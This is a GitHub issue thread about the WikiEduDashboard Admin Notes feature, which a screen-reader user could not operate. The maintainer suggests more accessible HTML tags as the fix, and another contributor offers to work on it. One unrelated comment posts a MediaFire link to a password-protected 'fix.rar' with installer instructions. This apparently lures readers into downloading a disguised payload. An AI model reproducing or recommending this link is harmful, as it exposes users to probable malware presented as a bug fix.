### ISSUE TITLE
Admin Notes feature is not accessible via screen reader

### ISSUE THREAD

**Issue by ragesoss** [WikiEducationFoundation/WikiEduDashboard#5941]
Here's the bug report from someone who uses a screen reader:

"I just tried to create a note on a dashboard course page and not sure if it's an accessibility issue but I didn't see how to actually input any text. I clicked on the admin notes button and didn't see where to write anything. I saw text that said create new note but it wasn't anything I could click on."

(These sorts of issues can often be fixed by using patterns from other parts of the Dashboard UI, typically by changing to a more accessible HTML tag and/or adding appropriate metadata to the element.)

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Abishekcs** [comment]
working on this
